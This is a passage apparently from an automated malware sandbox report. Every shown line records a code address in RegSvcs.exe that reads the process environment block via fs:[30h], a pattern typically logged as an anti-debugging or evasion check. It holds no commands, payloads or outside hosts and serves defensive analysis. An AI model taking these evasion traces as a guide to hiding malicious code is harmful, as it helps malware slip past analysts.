                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8A197 mov eax, dword ptr fs:[00000030h]15_2_00E8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F28158 mov eax, dword ptr fs:[00000030h]15_2_00F28158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h]15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h]15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F24144 mov ecx, dword ptr fs:[00000030h]15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h]15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F24144 mov eax, dword ptr fs:[00000030h]15_2_00F24144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96154 mov eax, dword ptr fs:[00000030h]15_2_00E96154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96154 mov eax, dword ptr fs:[00000030h]15_2_00E96154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C156 mov eax, dword ptr fs:[00000030h]15_2_00E8C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC0124 mov eax, dword ptr fs:[00000030h]15_2_00EC0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F50115 mov eax, dword ptr fs:[00000030h]15_2_00F50115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3A118 mov ecx, dword ptr fs:[00000030h]15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3A118 mov eax, dword ptr fs:[00000030h]15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3A118 mov eax, dword ptr fs:[00000030h]15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3A118 mov eax, dword ptr fs:[00000030h]15_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov eax, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E10E mov ecx, dword ptr fs:[00000030h]15_2_00F3E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA02E1 mov eax, dword ptr fs:[00000030h]15_2_00EA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA02E1 mov eax, dword ptr fs:[00000030h]15_2_00EA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA02E1 mov eax, dword ptr fs:[00000030h]15_2_00EA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h]15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h]15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h]15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h]15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A2C3 mov eax, dword ptr fs:[00000030h]15_2_00E9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA02A0 mov eax, dword ptr fs:[00000030h]15_2_00EA02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA02A0 mov eax, dword ptr fs:[00000030h]15_2_00EA02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h]15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F262A0 mov ecx, dword ptr fs:[00000030h]15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h]15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h]15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h]15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F262A0 mov eax, dword ptr fs:[00000030h]15_2_00F262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE284 mov eax, dword ptr fs:[00000030h]15_2_00ECE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE284 mov eax, dword ptr fs:[00000030h]15_2_00ECE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F10283 mov eax, dword ptr fs:[00000030h]15_2_00F10283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F10283 mov eax, dword ptr fs:[00000030h]15_2_00F10283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F10283 mov eax, dword ptr fs:[00000030h]15_2_00F10283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40274 mov eax, dword ptr fs:[00000030h]15_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8826B mov eax, dword ptr fs:[00000030h]15_2_00E8826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94260 mov eax, dword ptr fs:[00000030h]15_2_00E94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94260 mov eax, dword ptr fs:[00000030h]15_2_00E94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94260 mov eax, dword ptr fs:[00000030h]15_2_00E94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E96259 mov eax, dword ptr fs:[00000030h]15_2_00E96259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F18243 mov eax, dword ptr fs:[00000030h]15_2_00F18243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F18243 mov ecx, dword ptr fs:[00000030h]15_2_00F18243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8A250 mov eax, dword ptr fs:[00000030h]15_2_00E8A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8823B mov eax, dword ptr fs:[00000030h]15_2_00E8823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA03E9 mov eax, dword ptr fs:[00000030h]15_2_00EA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC63FF mov eax, dword ptr fs:[00000030h]15_2_00EC63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE3F0 mov eax, dword ptr fs:[00000030h]15_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE3F0 mov eax, dword ptr fs:[00000030h]15_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE3F0 mov eax, dword ptr fs:[00000030h]15_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F343D4 mov eax, dword ptr fs:[00000030h]15_2_00F343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F343D4 mov eax, dword ptr fs:[00000030h]15_2_00F343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E3DB mov eax, dword ptr fs:[00000030h]15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E3DB mov eax, dword ptr fs:[00000030h]15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E3DB mov ecx, dword ptr fs:[00000030h]15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3E3DB mov eax, dword ptr fs:[00000030h]15_2_00F3E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h]15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h]15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h]15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h]15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h]15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A3C0 mov eax, dword ptr fs:[00000030h]15_2_00E9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h]15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h]15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h]15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E983C0 mov eax, dword ptr fs:[00000030h]15_2_00E983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F163C0 mov eax, dword ptr fs:[00000030h]15_2_00F163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4C3CD mov eax, dword ptr fs:[00000030h]15_2_00F4C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E388 mov eax, dword ptr fs:[00000030h]15_2_00E8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E388 mov eax, dword ptr fs:[00000030h]15_2_00E8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E388 mov eax, dword ptr fs:[00000030h]15_2_00E8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB438F mov eax, dword ptr fs:[00000030h]15_2_00EB438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB438F mov eax, dword ptr fs:[00000030h]15_2_00EB438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E88397 mov eax, dword ptr fs:[00000030h]15_2_00E88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E88397 mov eax, dword ptr fs:[00000030h]15_2_00E88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E88397 mov eax, dword ptr fs:[00000030h]15_2_00E88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3437C mov eax, dword ptr fs:[00000030h]15_2_00F3437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F38350 mov ecx, dword ptr fs:[00000030h]15_2_00F38350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5A352 mov eax, dword ptr fs:[00000030h]15_2_00F5A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h]15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h]15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h]15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1035C mov ecx, dword ptr fs:[00000030h]15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h]15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1035C mov eax, dword ptr fs:[00000030h]15_2_00F1035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F12349 mov eax, dword ptr fs:[00000030h]15_2_00F12349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA30B mov eax, dword ptr fs:[00000030h]15_2_00ECA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA30B mov eax, dword ptr fs:[00000030h]15_2_00ECA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA30B mov eax, dword ptr fs:[00000030h]15_2_00ECA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C310 mov ecx, dword ptr fs:[00000030h]15_2_00E8C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB0310 mov ecx, dword ptr fs:[00000030h]15_2_00EB0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E904E5 mov ecx, dword ptr fs:[00000030h]15_2_00E904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1A4B0 mov eax, dword ptr fs:[00000030h]15_2_00F1A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E964AB mov eax, dword ptr fs:[00000030h]15_2_00E964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC44B0 mov ecx, dword ptr fs:[00000030h]15_2_00EC44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C460 mov ecx, dword ptr fs:[00000030h]15_2_00F1C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBA470 mov eax, dword ptr fs:[00000030h]15_2_00EBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBA470 mov eax, dword ptr fs:[00000030h]15_2_00EBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBA470 mov eax, dword ptr fs:[00000030h]15_2_00EBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE443 mov eax, dword ptr fs:[00000030h]15_2_00ECE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB245A mov eax, dword ptr fs:[00000030h]15_2_00EB245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8645D mov eax, dword ptr fs:[00000030h]15_2_00E8645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E420 mov eax, dword ptr fs:[00000030h]15_2_00E8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E420 mov eax, dword ptr fs:[00000030h]15_2_00E8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8E420 mov eax, dword ptr fs:[00000030h]15_2_00E8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C427 mov eax, dword ptr fs:[00000030h]15_2_00E8C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16420 mov eax, dword ptr fs:[00000030h]15_2_00F16420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA430 mov eax, dword ptr fs:[00000030h]15_2_00ECA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8402 mov eax, dword ptr fs:[00000030h]15_2_00EC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8402 mov eax, dword ptr fs:[00000030h]15_2_00EC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8402 mov eax, dword ptr fs:[00000030h]15_2_00EC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC5ED mov eax, dword ptr fs:[00000030h]15_2_00ECC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC5ED mov eax, dword ptr fs:[00000030h]15_2_00ECC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E925E0 mov eax, dword ptr fs:[00000030h]15_2_00E925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
